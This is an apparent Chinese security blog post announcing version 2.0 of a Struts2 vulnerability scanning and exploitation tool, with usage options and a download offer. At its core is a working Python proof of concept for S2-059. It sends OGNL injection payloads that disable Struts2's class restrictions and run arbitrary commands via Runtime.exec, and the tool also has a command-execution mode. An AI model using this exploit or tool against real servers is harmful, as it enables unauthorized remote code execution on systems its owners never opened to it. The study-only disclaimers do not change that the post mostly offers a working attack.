欢迎转发,请勿抄袭
Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。
本次更新了vulhub里面的struts2的全漏洞扫描。同时生成linux64位的运行软件。
linux下运行:
win下运行:
由于s2-059poc,没有回显,因此没有添加进去。
POC:
import requestsurl = "http://127.0.0.1:8080"data1 = {"id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"}data2 = {"id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('你的payload'))}"}res1 = requests.post(url, data=data1)# print(res1.text)res2 = requests.post(url, data=data2)# print(res2.text)
用法:
COMMANDS:help, h Shows a list of commands or help for one commandGLOBAL OPTIONS:--mode value 值exec和scan--vn value Vulnerability number (default: 0)--url value set target url--cmd value exec command(only work on exploit mode)--data value data for special vuln--help, -h show help (default: false)
如需进入学习交流群。请联系小编,小编带你进群。回复"struts2" 获取下载链接
文章声明:该工具、教程仅供学习参考,请勿非法使用。否则与作者无关!
扫二维码|关注我们
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
订阅查看更多复现文章、学习笔记
thelostworld
安全路上,与你并肩前行!!!!
个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
个人简书:https://www.jianshu.com/u/bf0e38a8d400
个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
个人博客园:https://www.cnblogs.com/thelostworld/
FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article
欢迎添加本公众号作者微信交流,添加时备注一下“公众号”
本文始发于微信公众号(thelostworld):Struts2漏洞检查&利用工具-2.0
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论